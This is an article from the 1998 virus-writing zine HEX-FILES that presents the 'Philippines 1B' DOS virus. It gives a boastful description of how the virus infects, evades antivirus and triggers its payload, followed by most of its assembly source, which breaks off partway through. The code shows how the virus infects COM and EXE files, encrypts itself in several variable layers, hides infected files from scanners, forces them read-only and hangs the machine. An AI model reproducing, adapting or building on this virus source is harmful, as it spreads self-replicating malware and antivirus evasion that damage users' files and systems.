Copy Link
Add to Bookmark
Report
Hexfiles Issue 2 File 015
HEX-FILES No. 2 File 015
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Philippines 1A and Philippines 1B
(fixed to work on all CPUs)
I fixed Philippines 1 virus just for you. So let us get to know it
first.
When I first wrote this virus back in 1993, I wanted to do something
different. Something that has not yet been seen in the Philippines at
that time. I also wanted to force AVs to make extra efforts if they
want to cleanly remove the virus from an infected program. The
easiest to do this is through encryption. That's what I did and I
overdone it a bit. I made several layers of encryption, made the
encryption mask on some layers variable, and scattered the data
needed by AVs to put a program back to what it was before. This way
AVs have to peel off each layer of encryption if it wanted to restore
an infected program. AVs can opt for the easy way out by deleting the
infected program. So folks, don't blame me if AVs delete your files.
It's their fault and not mine.
What does it do? Aside from infecting programs, it does mischief and
fulfills one of my dreams -- become a swimmer.
* The Infection * It is found at the end of files because it is
easier done this way and I would not have to overworked your drives
from too much read and write. I also align your programs before
infecting it. So in addition to the length of the virus, you would
get one to 16 bytes more. I also set the read-only attribute of
infected programs so that you would have a hard time deleting it.
Oh, the virus only infects on EXEC (21/4B00)
* The Encryption * The virus in COM is encrypted in three layers,
with the second layer split in two parts in some cases. In EXE, the
virus is encrypted six times. The portion from the start of the
virus up to the EXE entry point is encrypted in three layers.
Portion from the EXE entry point routine up to the end of the virus
is also encrypted in three layers, with the possibility of
splitting the second layer into two. The "Philippines" at the end
of the virus is not encrypted because it is my signature.
* The Mischief * The virus also checks for get/set file attribute
(21/43) and file open (21/3D). If the program is COM or EXE, I
check it for infection. If it is not infected, I let it do what it
asked for in the first place. However, if it is already infected...
...If you asked to see the attributes set for a program, I would
let you see it except for the read-only attribute which I hid.
If you requested to set an attribute, I would force the setting
of the read-only attribute whether you like it or not. You would
not be able to delete an infected file through DOS.
...If you opened an infected program, I would open it for you but
would let you think that you had failed. (This is my way of
preventing AVs from scanning an infected program :), but it does
not work against all AVs. :( ) I would open the file, set the
error flag, and would return to you with the error code for
"file not found". The file handle of the opened program is not
saved. If you tried to open too many infected programs you might
run out of file handles which would neccessitate a system reset.
* The Wish * One of the things I really wanted to do is learn how to
swim. What with the nice beaches near you. (But don't try to swim
in and around Manila Bay unless you are a masochist or have
suicidal tendencies. Don't you know that it is very expensive to
die. Have pity on your family who are going to shoulder all those
expenses.) But no can do. You see I have this fear of going into
water more than waist deep without something firm and solid to hold
on to. Since I couldn't swim, I just have to content myself on
being a good swimmer in my dreams. And, now, in your computers too.
I set up an Int 8 handler (Didn't I tell you in HEX-FILES No. 1
that Possessed taught me a lot of things. This is one of them.
Other parts of this virus I got ideas, directly or indirectly, from
Possessed.) so that you would not be able to break off from it.
Even Windows crashes. There are two triggers: length of time (about
four hours) and infection count (at least on the 98th file
infected). When these are met, I would display the swimmer happily
doing my version of the breast stroke in your screen. You would
need to reboot to end the show.
If the swimmer is too fast or too slow in your computer, increase
or decrease the value of DI in "DoDelay" routine. The value of DI
currently set is just fine for my Pentium 166.
An improved swimmer is in Philippines 3 (aka Kakabakaba).
Two debug scripts are included here. One is a compilation of the
first fix, Philippine 1A, which is just enough to make Philippines 1
work on my computer. The other, Philippines 1B, has more changes in
the code. I would only present you with the source of the Philippines
1B because Philippines 1A is almost similar to Philippines 1.
Enjoy....
ÄÄ PHLPNS1B.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;-------------------------------------------------------------------
; HEX-FILES No. 2 March 1998
;-------------------------------------------------------------------
;
; Virus: Philippines 1B
; Author: Putoksa Kawayan
; Origin: Manila, Philippines
;
;-------------------------------------------------------------------
;
; You can use *TASM 2.01* or *MASM 5.0* to compile this source code.
; The executable program created by TASM and MASM would be the same.
; However, there would be differences in the first generation codes
; which do not affect the main virus code and, therefore, does not
; concern us.
;
; If you would be using A86, you would need need to fix the forwardly
; addressed data.
;
; Compile to EXE.
;
;-------------------------------------------------------------------
;
TITLE Philippines 1B Virus by Putoksa Kawayan 3.1998
VectorTable SEGMENT AT 0
ORG 4*1
VectorTab1 LABEL DWORD
VectorTab1IP DW ?
VectorTab1CS DW ?
ORG 4*19h
VectorTab19 LABEL DWORD
VectorTab19IP DW ?
VectorTab19CS DW ?
VectorTable ENDS
Philippines1B SEGMENT WORD 'Code'
ASSUME CS:Philippines1B, DS:Philippines1B
;================================================ constants
VirLen EQU (Offset ReadArea-Offset InitC)
SubOff EQU (Offset Bios8-Offset Bios7)
ExeEnc1 EQU (Offset Country-Offset InitE10)
ExeEnc2 EQU (Offset Country-Offset InitE13)
ExeEnc3 EQU (Offset Country-Offset InitE4)
ExeEnc4 EQU (Offset InitE-Offset InitC)
ComEnc1 EQU (Offset Country-Offset InitC3)
ComEnc2 EQU (Offset Country-Offset InitC5)
ComEnc3 EQU (Offset Country-Offset FindFirstFile)
CountryLen EQU (Offset ReadArea-Offset Country)
MessageLen EQU (Offset ReadArea-Offset Message)
ChecklistLen EQU (Offset Interrupt8-Offset Checklist)
ComEntryLen EQU (Offset XorMaker-Offset ComEntry)
SwimmerLen EQU (Offset Checklist-Offset Swimmer5Top)
ResidePara EQU ((((Offset MessageFirstGen-Offset InitC)+100h)/16)+1)
;==============================================================
; Entry point for com.
;==============================================================
InitC: ;decryptor for com
MOV DI,1111h ;first level encryption
MOV SI,DI ;
InitC1: ;
LODSB ;
SUB AL,0 ;
STOSB ;
DEC BX ;
JZ InitC2 ;
JMP InitC1 ;
;----------------------------------------;---------------------
InitC2: ; set up for install
MOV AX,CS ;
JMP InitC3 ;
;----------------------------------------;---------------------
;
PrepareToEncrypt: ;
MOV ES,AllocMem ; copy virii to alloc mem
XOR DI,DI ; in preparation for
MOV SI,DI ; encryption
MOV CX,Virlen ;
REPE MOVSB ;
PUSH ES ;
POP DS ;
RET ;
;
;----------------------------------------;---------------------
ComEntry: ;
MOV BX,ComEnc1 ;com jumper
CLD ;
MOV BP,4444h ;
PUSH BP ;
RET ;
;----------------------------------------;---------------------
XorMaker: ;
CALL GetBase ; operand generator
OR DL,DL ; for xor
JNZ XorMak1 ;
ADD DL,DH ;
SHR DL,1 ;
OR DL,DL ;
JZ XorMaker ;
XorMak1: ;
RET ;
;----------------------------------------;---------------------
UseFileName: ;checks filename
CLD ;
MOV BX,DX ;
PUSH DX ;
FilNam1: ;
MOV AL,[BX] ;
OR AL,AL ;
JZ FilNam3 ;
CMP AL,'a' ;
JB FilNam2 ;
CMP AL,'z' ;
JA FilNam2 ;
SUB AL,20h ; caps filename
MOV [BX],AL ;
FilNam2: ;
INC BX ;
JMP FilNam1 ;
FilNam3: ;
MOV CX,BX ;
INC CX ;
POP SI ;
SUB CX,SI ;
PUSH CX ;
PUSH DS ;
POP ES ;
MOV AL,'.' ;
MOV DI,DX ;
REPNZ SCASB ; find file extension
MOV AX,'EX' ;
CMP [DI],AH ; is exe?
JNE FilNam5 ;
CMP [DI+1],AX ;
JNE FilNam8 ;
FilNam4: ;
PUSH CS ;
POP ES ;
MOV BYTE PTR CS:FileType,1 ; file type flag for ok
JMP Short FilNam9 ;
FilNam5: ;
MOV AX,'MO' ; is com?
CMP [DI+1],AX ;
JNE FilNam8 ;
CMP BYTE PTR [DI],'C' ;
JNE FilNam8 ;
POP CX ;
PUSH CX ;
SUB CX,4 ;
MOV AX,':\' ;
FilNam6: ;
CMP [DI-1],AL ; get start of filename
JE FilNam7 ;
CMP [DI-1],AH ;
JE FilNam7 ;
DEC DI ;
LOOP FilNam6 ;
FilNam7: ;
MOV SI,DI ;
PUSH CS ;
POP ES ;
MOV DI,Offset CommandCom ;
MOV CX,11 ;
REPE CMPSB ; is command.com?
JNE FilNam4 ; if yes, don't infect
FilNam8: ;
MOV BYTE PTR CS:FileType,0 ; file type flag for not ok
FilNam9: ; we wont infect file
POP CX ;
RET ;
;----------------------------------------;---------------------
CommandCom DB 'COMMAND.COM'
;------------------------------------------------ EXEC param
ExecutePara DW 0
ExecutePara1 DW 0080h
ExecutePara2 DW ?
ExecutePara3 DW 005Ch
ExecutePara4 DW ?
ExecutePara5 DW 006Ch
ExecutePara6 DW ?
;------------------------------------------------ constants
SecBytes DW 512
ParaBytes DW 16
StackSeg DW ?
;----------------------------------------;---------------------
InitC3: ; decryptor for com
MOV SI,Offset InitC5 ; second level of encryption
ADD SI,BP ;
MOV DI,SI ;
MOV DX,ComEnc2 ;
MOV CL,3 ;
InitC4: LODSB ;
ROR AL,CL ;
STOSB ;
DEC DX ;
JZ InitC5 ;
JMP InitC4 ;
;----------------------------------------;---------------------
InitC5: ; decryptor for com
MOV SI,Offset FindFirstFile ; third level of encryption
ADD SI,BP ;
MOV DI,SI ;
MOV CX,ComEnc3 ;
InitC6: ;
LODSB ;
XOR AL,0 ;
STOSB ;
DEC CX ;
JE InitC7 ;
JMP InitC6 ;
;--------------------------------------------------------------
FindFirstFile: ;
PUSH DX ;
MOV AH,1Ah ; set dta
MOV DX,Offset ReadArea ;
CALL UseOldDos ;
POP DX ;
MOV AH,4Eh ; and find file
MOV CX,7 ;
CALL UseOldDos ;
RET ;
;--------------------------------------------------------------
InitC7: CALL MemResChk ; is memory resident?
JNE InitV1 ;
InitC8: MOV DI,100h ; restore com 32 bytes
MOV SI,Offset DataStorage ; and execute host
ADD SI,BP ;
PUSH DI ;
MOV CX,16 ;
REPE MOVSW ;
RET ;
;--------------------------------------------------------------
MemChkOK: ; return memory self rec
NOT AX ; flip bits
POPF ;
IRET ;
;--------------------------------------------------------------
RestoreInt24: ; restore error interrupt
LDS DX,CS:Int24Address ;
MOV AX,2524h ;
CALL UseOldDos ;
RET ;
;--------------------------------------------------------------
Interrupt24: ;
MOV AL,3 ; error int handler
IRET ;
;----------------------------------------;---------------------
InitV1: ;
PUSH ES ; move virus to psp:100
MOV SI,BP ;
XOR DI,DI ;
MOV AX,ES ;
ADD AX,16 ;
MOV ES,AX ;
MOV CX,((Virlen+1)/2) ;
REPE MOVSW ;
PUSH ES ;
POP DS ;
POP ES ;
PUSH AX ;
MOV BP,Offset InitV2 ; and relocate
PUSH BP ;
RETF ;
;--------------------------------------------------------------
EncryptData: ; encrypt/decrypt
PUSH SI ; message and swimmer
PUSH CX ;
PUSH SI ;
POP DI ;
EncDat1: ;
LODSB ;
NOT AL ;
STOSB ;
LOOP EncDat1 ;
POP CX ;
POP SI ;
RET ;
;----------------------------------------;---------------------
InfectionCount DB 0 ; infection counter
;----------------------------------------;---------------------
Interrupt21: ; my dos int handler
PUSHF ;
CMP AX,4B00h ; is exec?
JE Dos1 ;
CMP AX,0F00Fh ; is self rec?
JE MemChkOK ;
JMP OpenFile ; go to next check.
;
Dos1: PUSH AX ; save regs before infect
PUSH BX ;
PUSH CX ;
PUSH DX ;
PUSH SI ;
PUSH DI ;
PUSH DS ;
PUSH ES ;
CALL Propagate ; infect an exe first
CALL GoToWork ; infect exec program
Dos2: POP ES ; restore registers
POP DS ;
POP DI ;
POP SI ;
POP DX ;
POP CX ;
POP BX ;
POP AX ;
Dos3: POPF ; and pass to old dos handler
JMP CS:Int21Address ;
;----------------------------------------;---------------------
InitV2: ; set up exec param
MOV AX,ES:[2Ch] ;
MOV Environment,AX ;
MOV AX,ES ;
MOV CS:ExecutePara2,AX ;
MOV CS:ExecutePara4,AX ;
MOV CS:ExecutePara6,AX ;
PUSH ES ;
PUSH CS ;
POP ES ;
;----------------------------------------;---------------------
; make fresh copy of message
; to prevent patched variants
;
MOV BL,1 ; set for two pass
InitV3: ;
MOV SI,Offset MessageEnc ;
MOV CX,MessageLen ;
CALL EncryptData ; encrypt/decrypt
OR BL,BL ;
JZ InitV4 ; done two passes?
MOV DI,Offset Message ;
REPE MOVSB ; make new copy of message
DEC BL ;
JMP InitV3 ; do next pass
;----------------------------------------;---------------------
InitV4: ;
POP ES ; set ss,sp
CLI ;
MOV AX,CS ;
MOV SS,AX ;
MOV SP,(Offset SaveScreen-1) ;
STI ;
JMP InitV5 ;
;----------------------------------------;---------------------
GoToWork: ;
CALL UseFileName ;
CMP BYTE PTR CS:FileType,0 ; can infect file?
JNE Dos4 ;
RET ;
Dos4: MOV SI,DX ;
MOV DI,Offset ASCIIZ ; copy asciiz to ours
REPE MOVSB ;
Dos5: PUSH CS ;
POP DS ;
MOV AX,3524h ; save error int
CALL UseOldDos ;
MOV Int24IP,BX ;
MOV Int24CS,ES ;
MOV AX,2524h ; set our own error handler
MOV DX,Offset Interrupt24 ;
CALL UseOldDos ;
PUSH CS ;
POP ES ;
MOV DX,Offset ASCIIZ ; open the file read only
MOV AX,3D00h ;
CALL UseOldDos ;
JC Dos7 ;
XCHG BX,AX ;
MOV AX,4202h ; set pointer to location of
MOV CX,-1 ; eof sig
MOV DX,-11 ;
CALL UseOldDos ;
MOV CX,11 ; read 11 bytes
MOV DX,Offset ReadArea ;
MOV AH,3Fh ;
CALL UseOldDos ;
JC Dos6 ;
MOV DX,18 ; move ptr to begin of file +18
CALL MovePointerToChkSm ;
MOV DX,Offset Chksum ;
MOV CX,2 ; read 2 bytes
MOV AH,3Fh ;
CALL UseOldDos ;
Dos6: PUSHF ;
MOV AH,3Eh ;
CALL UseOldDos ; close file
POPF ;
JC Dos7 ;
MOV DI,Offset ReadArea ; File[eof-11..eof] = Philippines
MOV SI,Offset Country ;
MOV CX,11 ;
REPE CMPSB ;
JNE Dos8 ;
CMP Chksum,9818h ; File[18..19] = 18 98
JNE Dos8 ;
Dos7: JMP RestoreInt24 ;
;
Dos8: XOR DX,DX ;
MOV BX,Offset ASCIIZ ;
CMP BYTE PTR [BX+1],':' ;
JNE Dos8A ;
MOV DL,[BX] ;
SUB DL,'A'-1 ;
Dos8A:MOV AH,36h ;
CALL UseOldDos ;
JC Dos7 ;
MUL BX ;
MUL CX ;
OR DX,DX ;
JNZ Dos9 ;
CMP AX,(((VirLen/512)+1)*512); minimum disk space required
JB Dos7 ;
Dos9: MOV BX,((VirLen/16)+2) ; allocate memory to encrypt virus
MOV AH,48h ;
CALL UseOldDos ;
JC Dos7 ;
MOV AllocMem,AX ;
MOV DX,Offset ASCIIZ ; get and clear file attribute
MOV AX,4300h ;
CALL UseOldDos ;
JC Dos11 ;
MOV Attribute,CX ;
MOV AX,4301h ;
XOR CX,CX ;
CALL UseOldDos ;
JC Dos11 ;
MOV AX,3D02h ; open file
CALL UseOldDos ;
JC Dos11 ;
XCHG BX,AX ;
MOV FileHandle,BX ;
MOV AX,5700h ; save file time and date stamp
CALL UseOldDos ;
MOV FileTime,CX ;
MOV FileDate,DX ;
XOR CX,CX ; get length of file
XOR DX,DX ;
MOV AX,4202h ;
CALL UseOldDos ;
MOV LoLen,AX ;
MOV HiLen,DX ;
PUSH AX ;
CALL MovePointerStart ;
MOV DX,Offset ReadArea ; read 32 byte from begin of file
MOV CX,32 ;
MOV AH,3Fh ;
CALL UseOldDos ;
POP AX ;
CMP ExeID,'ZM' ; is exe?
JE Dos12 ;
CMP AX,1993 ; is lolen = 1993 (year virus was
JB Dos14 ; originally written)
Dos10:JMP Dos18 ; it's com.
;
Dos11:JMP Dos23 ;
;
Dos12:MOV AX,OffsSS ; save exe header's
MOV StackSeg,AX ; ss
MOV AX,OffsSP ;
MOV SPoint,AX ; sp
MOV AX,OffsCS ;
MOV CodeSegt,AX ; cs
MOV AX,OffsIP ;
MOV IPoint,AX ; ip
MOV AX,BlocksNo ;
CMP BytesLast,0 ;
JE Dos13 ;
DEC AX ;
Dos13:MUL SecBytes ;
ADD AX,BytesLast ; align exe length
ADC DX,0 ;
ADD AX,ParaBytes ;
ADC DX,0 ;
AND AL,0F0h ;
MOV LoLen,AX ;
MOV HiLen,DX ;
ADD AX,VirLen ;
ADC DX,0 ;
JNC Dos15 ;
Dos14:JMP Dos22 ;
;
Dos15:DIV SecBytes ;
OR DX,DX ;
JZ Dos16 ;
INC AX ;
Dos16: ;
MOV BlocksNo,AX ; set page count
MOV BytesLast,DX ; set mod 512
MOV DX,HiLen ;
MOV AX,LoLen ;
DIV ParaBytes ;
SUB AX,HeaderPara ; determine cs segment for vir
MOV OffsCS,AX ;
MOV OffsIP,Offset InitE ; virus ip = code entry point
MOV Chksum,9818h ;
MOV OffsSP,Offset SaveScreen-1 ; virus sp
MOV OffsSS,AX ;
INC InfectionCount ; increment counter
JMP EncryptExe ;
;
Dos17:CALL MovePointerStart ; prepare to write new exe header
MOV CX,28 ; write 18 bytes
JMP Short Dos21 ;
Dos18: ;
MOV AX,LoLen ; align com length to para
ADD AX,16 ;
JC Dos22 ;
AND AX,0FFF0h ;
MOV LoLen,AX ;
ADD AX,VirLen ;
JC Dos22 ; over 64k?
Dos19:PUSH DS ;
POP ES ;
MOV DI,Offset DataStorage ; save 32 bytes of com start
MOV SI,Offset ReadArea ;
MOV CX,16 ;
REPE MOVSW ;
INC InfectionCount ; increment file counter
JMP EncryptCom ;
;
Dos20:MOV DS,CS:LoLen ; get 32 bytes of garbage
MOV DI,Offset ReadArea ;
PUSH DI ;
MOV CX,16 ;
REPE MOVSW ;
PUSH CS ;
POP DS ;
POP DI ;
MOV SI,Offset ComEntry ; copy com entry jumper to vir
MOV CX,ComEntryLen ;
REPE MOVSB ;
MOV Chksum,9818h ; set infection marker
CALL MovePointerStart ;
MOV CX,32 ; write 32 bytes to start of com
Dos21:MOV DX,Offset ReadArea ; write to start of file
MOV AH,40h ; (exe header or com entry point)
CALL UseOldDos ;
MOV CX,FileTime ; reset file time and date stamp
MOV DX,FileDate ;
MOV AX,5701h ;
CALL UseOldDos ;
Dos22:MOV AH,3Eh ; close file
CALL UseOldDos ;
MOV CX,Attribute ; restore attribute but make sure
OR CX,1 ; the read only attribute is set
MOV DX,Offset ASCIIZ ;
MOV AX,4301h ;
CALL UseOldDos ;
Dos23:MOV ES,AllocMem ; release allocated memory
MOV AH,49h ;
CALL UseOldDos ;
JMP LookForChkSum ; search for cpav/msav checksum file
;
;--------------------------------------------------------------
ReturnControl LABEL DWORD ;
IPoint DW ? ; exe cs:ip
CodeSegt DW ? ;
;--------------------------------------------------------------
SubMaker: ;
CALL GetBase ;operand generator
OR DL,DL ; for add and sub
JZ SubMaker ;
MOV DH,DL ;
NEG DL ;
RET ;
;--------------------------------------------------------------
WriteVirusCode: ;
MOV DX,CS:LoLen ; move pointer to eof
MOV CX,CS:HiLen ; and write virus
MOV BX,CS:FileHandle ;
CALL MovePointer ;
MOV CX,VirLen ;
XOR DX,DX ;
MOV AH,40h ;
CALL UseOldDos ;
RET ;
;--------------------------------------------------------------
GetBase: ; I should have used value in Timer!
XOR AX,AX ; read time from bios
INT 1Ah ;
CMP CS:LastTime,DX ; is it the same as last time?
MOV CS:LastTime,DX ;
JNE GetBase1 ;
PUSH DX ;
MOV AH,2Ch ; read time through dos
CALL UseOldDos ;
POP AX ;
XOR AX,CS:FileTime ; and randomize
GetBase1: ;
ADD AX,DX ;Note: When I was doing this back
ADD AX,CX ; in 93, I had trouble when it
MUL DX ; was just past midnight. I don't
ADD DX,AX ; know if this is the same one
CMP CX,1 ; or was fixed. I can't remember.
JBE GetBase2 ; It was that long ago. You would
MOV AX,DX ; think that your computer crashed
MUL CX ; when in fact it was on a loop to
ADD DX,AX ; get an acceptable value.
GetBase2: ; See XorMaker and SubMaker for
RET ; looping back to GetBase.
;--------------------------------------------------------------
MessageEnc DB 'Likha ni Putoksa Kawayan sa Manila, '
DB 'Philippines'
;==============================================================
; EXE entry point
;==============================================================
InitE: ;
MOV SI,Offset InitE4 ; topmost level decryption
PUSH SI ;
InitE1:MOV DX,0 ;
InitE2:MOV AL,CS:[SI] ;
InitE3:XOR AL,0 ;
MOV CS:[SI],AL ;
INC SI ;
DEC DX ;
JNZ InitE2 ;
RET ;
;--------------------------------------------------------------
InitE4:CLD ; decryption for exe
MOV DI,SI ; second level of encryption
PUSH ES ;
PUSH CS ;
POP DS ;
PUSH DS ;
POP ES ;
InitE5:MOV CX,0 ; do we have two-tier encryption?
JCXZ InitE8 ;
InitE6:LODSB ; if yes, decrypt first half
InitE7:XOR AL,0 ;
STOSB ;
DEC CX ;
JNZ InitE6 ;
InitE8:MOV SI,Offset InitE10 ;
MOV DI,SI ;
MOV BP,ExeEnc1 ;
MOV CL,5 ;
InitE9:LODSB ; always have this decryption.
ROL AL,CL ;
STOSB ;
DEC BP ;
JZ InitE10 ;
JMP InitE9 ;
;--------------------------------------------------------------
InitE10:MOV SI,Offset InitE13 ; decryption for exe
MOV DI,SI ; third level encryption
MOV CX,ExeEnc2 ;
InitE11:LODSB ;
InitE12:SUB AL,0 ;
STOSB ;
DEC CX ;
JZ InitE13 ;
JMP InitE11 ;
;--------------------------------------------------------------
; what we've been doing is decrypt the lower half of the virus
; and now for the upper half...
;--------------------------------------------------------------
InitE13:MOV SI,Offset InitC ; decryption for exe
MOV DI,SI ; fourth level encryption
MOV CX,ExeEnc4 ; (first level for upper half
PUSH CX ; of virus)
PUSH SI ;
PUSH DI ;
InitE14:LODSB ;
InitE15:ADD AL,0 ;
STOSB ;
LOOP InitE14 ;
;--------------------------------------------------------------
POP DI ; decryption for exe
POP SI ; fifth level encryption
POP CX ; (second level for upper half
PUSH CX ; of virus)
PUSH SI ;
PUSH DI ;
InitE16:LODSB ;
NEG AL ;
STOSB ;
LOOP InitE16 ;
;--------------------------------------------------------------
POP DI ; decryption for exe
POP SI ; sixth level encryption
POP CX ; (third level for upper half
InitE17:MOV AH,0 ; of virus)
InitE18:LODSB ;
XOR AL,AH ;
STOSB ;
LOOP InitE18 ;
;--------------------------------------------------------------
; Done decrypting. Proceeding to install.
;--------------------------------------------------------------
MOV BP,CX ;
CALL MemResChk ; check if already resident
POP ES ;
JNE InitE19 ; is resident?
MOV BX,ES ; yes ||
ADD BX,16 ; \/
ADD StackSeg,BX ; init exe stack
ADD CodeSegt,BX ; and code segments
MOV SS,StackSeg ; set up stack segment and
MOV SP,SPoint ; pointer
PUSH ES ;
POP DS ;
JMP CS:ReturnControl ; jump to exe cs:ip
; == execute host exe
;--------------------------------------------------------------
DataStorage DB 32 DUP (?) ; saved host com codes
;--------------------------------------------------------------
InitE19:JMP InitV1 ; prepare to go resident
;----------------------------------------;---------------------
CheckIfInfected: ;
PUSH AX ; save regs
PUSH BX ;
PUSH CX ;
PUSH DX ;
PUSH SI ;
PUSH DI ;
PUSH DS ;
PUSH ES ;
CALL UseFileName ;
CMP BYTE PTR CS:FileType,1 ; is file ok to infect?
JE ChkInfect2 ;
ChkInfect1: ;
MOV BP,CS:Environment ; no, restore bp
JMP Dos2 ;
ChkInfect2: ;
MOV DI,Offset ASCIIZ ; copy filename to our data area
MOV SI,DX ;
PUSH DI ;
REPE MOVSB ;
PUSH CS ;
POP DS ;
POP DX ;
MOV AX,3D00h ; open file
CALL UseOldDos ;
JC ChkInfect1 ;
XCHG BX,AX ;
MOV DX,18 ;
CALL MovePointerToChkSm ; move pointer to 18th byte...
MOV DX,Offset Chksum ;
MOV CX,2 ;
MOV AH,3Fh ;
CALL UseOldDos ; ...and read 2 bytes
MOV AH,3Eh ;
CALL UseOldDos ; close file
POP ES ; restore regs
POP DS ;
POP DI ;
POP SI ;
POP DX ;
POP CX ;
POP BX ;
POP AX ;
PUSH BP ; bp = our return offset
RET ; don't want to do jmp bp
;--------------------------------------------------------------
; Routine to itialize exe decryptors and encrypt virus
; for exe infection
;--------------------------------------------------------------
EncryptExe: ;
CALL PrepareToEncrypt ; copy virus to alloc mem
CALL XorMaker ; get xor operand
MOV SI,Offset InitE17+1 ;
MOV [SI],DL ; set decryptor operand
MOV SI,Offset InitC ;
MOV DI,SI ;
MOV CX,ExeEnc4 ;
PUSH CX ;
PUSH SI ;
PUSH DI ;
EncE1:LODSB ; encrypt third level
XOR AL,DL ; upper half of virus
STOSB ;
LOOP EncE1 ;
POP DI ;
POP SI ;
POP CX ;
PUSH CX ;
PUSH SI ;
PUSH DI ;
EncE2:LODSB ; encrypt second level
NEG AL ; upper half of virus
STOSB ;
LOOP EncE2 ;
CALL SubMaker ; get add operand
MOV SI,Offset InitE15+1 ;
MOV [SI],DL ; set decryptor operand
POP DI ;
POP SI ;
POP CX ;
EncE3:LODSB ; encrypt first level
ADD AL,DH ; upper half of virus
STOSB ;
LOOP EncE3 ;
CALL GetBase ; get random 16 bit number
MOV CX,AX ;
MOV SI,Offset InitE5+1 ; set start of encryption
MOV BP,ExeEnc3 ; set length of encryption
CMP CX,BP ;----------------------------
JBE EncE4 ;
SHR CX,1 ; try to generate a number
SHR CX,1 ; less than encrypted len
SHR CX,1 ; so that there will be a
SHR CX,1 ; two-tiered encryption
CMP CX,BP ; for this level
JBE EncE4 ;
SUB CX,CS:LoLen ;
AND CX,0FFFh ;
CMP CX,BP ;
JBE EncE4 ;----------------------------
XOR BX,BX ; we only produced a number
MOV CX,BP ; >= encrypted len
MOV [SI],BX ; set first tier to 0
JMP Short EncE5 ;
EncE4:MOV BX,BP ;
SUB BX,CX ;
MOV [SI],BX ; set first tier encrypt len
EncE5:MOV SI,Offset InitE1+1 ;
MOV [SI],CX ; set second tier encrypt len
PUSH CX ;
PUSH BX ;
CALL SubMaker ; get sub operand
MOV SI,Offset InitE12+1 ;
MOV [SI],DL ; set decryptor operand
MOV DI,Offset InitE13 ;
MOV SI,DI ;
MOV CX,ExeEnc2 ;
EncE6:LODSB ; encrypt third level
SUB AL,DH ; lower half of virus
STOSB ;
LOOP EncE6 ;
MOV SI,Offset InitE10 ;
MOV DI,SI ;
MOV DX,ExeEnc1 ;
MOV CX,5 ;
EncE7:LODSB ; encrypt second tier
ROR AL,CL ; second level lower
STOSB ; half of virus
DEC DX ;
JNZ EncE7 ;
POP CX ; do we have a first tier?
JCXZ EncE9 ;
PUSH CX ;
CALL XorMaker ; get xor operand
MOV SI,Offset InitE7+1 ;
MOV [SI],DL ; set decryptor operand
MOV SI,Offset InitE4 ;
MOV DI,ExeEnc3 ;
POP CX ;
SUB DI,CX ;
ADD SI,DI ;
MOV DI,SI ;
EncE8:LODSB ; encrypt first tier
XOR AL,DL ; second level lower
STOSB ; half of virus
DEC CX ;
JNZ EncE8 ;
EncE9:CALL XorMaker ; get xor operand
MOV SI,Offset InitE4 ;
POP CX ;
MOV DI,Offset InitE3+1 ;
MOV [DI],DL ; set decryptor operand
MOV DI,SI ;
EncE10:LODSB ;
XOR AL,DL ; encrypt exe topmost encryption
STOSB ;
LOOP EncE10 ;
PUSH CS ;
POP ES ;
CALL WriteVirusCode ; write virus
PUSH CS ;
POP DS ;
JMP Dos17 ; return to exe routine
;--------------------------------------------------------------
Propagate: ; routine to infect an exe
PUSH DX ; prior to infection of
PUSH DS ; exec program
PUSH ES ;
MOV BX,DX ;
CMP BYTE PTR [BX+1],':' ; is there drive spec?
JNE Prop1 ;
MOV AL,[BX] ;
JMP Short Prop2 ; if none,
Prop1:MOV AH,19h ; get default drive
CALL UseOldDos ;
ADD AL,'A' ; and convert to drive spec
Prop2:PUSH CS ;
POP DS ;
PUSH DS ;
POP ES ;
MOV ExeAsciiz,AL ;
MOV AH,':' ;
MOV DI,Offset ASCIIZ ;
MOV BP,DI ;
CLD ; set drive spec to asciiz
STOSW ;
MOV DX,Offset ExeAsciiz ;
CALL FindFirstFile ; look for exe
JC Prop4 ;
MOV SI,Offset ReadArea+1Eh ;
Prop3:LODSB ;
STOSB ; copy filename to asciiz
OR AL,AL ;
JNZ Prop3 ;
MOV DX,BP ;
CALL GoToWork ; infect!
Prop4:POP ES ;
POP DS ;
POP DX ;
RET ;
;--------------------------------------------------------------
MovePointerStart: ; multiple entry
XOR DX,DX ; move file pointer
MovePointerToChkSm: ; routines
XOR CX,CX ;
MovePointer: ;
MOV AX,4200h ;
;--------------------------------------------------------------
UseOldDos: ;
PUSHF ; call to old dos handler
CALL CS:Int21Address ;
RET ;
;
;--------------------------------------------------------------
ExeAsciiz DB 'C:*.EXE',0 ; exe search mask
;--------------------------------------------------------------
; Swimmer data.
;--------------------------------------------------------------
Swimmer5Top DB -1,63,32,31,32,31,32,31,32,31,32,31,'\',31
Swimmer5Middle DB -1,63,'=',31,'=',31,'-',31,'-',31,'-',31,'O',31
Swimmer5Bottom DB -1,63,32,31,32,31,32,31,32,31,32,31,'/',31
Swimmer2Top DB -1,63,32,31,32,31,32,31,32,31,32,31,32,31,'/',31
Swimmer2Middle DB -1,63,'=',31,'=',31,'-',31,'-',31,'-',31,'O',31
Swimmer2Bottom DB -1,63,32,31,32,31,32,31,32,31,32,31,32,31,'\',31
Swimmer1Sides DB -1,63,32,31,32,31,32,31,32,31,32,31,32,31
Swimmer1Middle DB -1,63,'=',31,'=',31,'-',31,'-',31,'-',31,'O',31
DB '=',31,'=',31
Swimmer3Top DB -1,63,'\',31,32,31,32,31,32,31,32,31,'/',31
Swimmer3Middle DB -1,63,32,31,'-',31,'-',31,'-',31,'O',31
Swimmer3Bottom DB -1,63,'/',31,32,31,32,31,32,31,32,31,'\',31
Swimmer4Top DB -1,63,'\',31,32,31,32,31,'\',31
Swimmer4Middle DB -1,63,'-',31,'-',31,'-',31,'O',31
Swimmer4Bottom DB -1,63,'/',31,32,31,32,31,'/',31
;--------------------------------------------------------------
Checklist DB 'CHKLIST.*',0 ; cpav/msav data search mask
;--------------------------------------------------------------
Interrupt8: ;
INT 3 ;
PUSHF ;
INC CS:Timer ;
JNZ Bios1 ;
DEC BYTE PTR CS:HourCount ; is it 4 hours already?
JNZ Bios1 ;
CMP CS:InfectionCount,98 ; infect count reached 98?
JNB Bios2 ;
Bios1:POPF ;
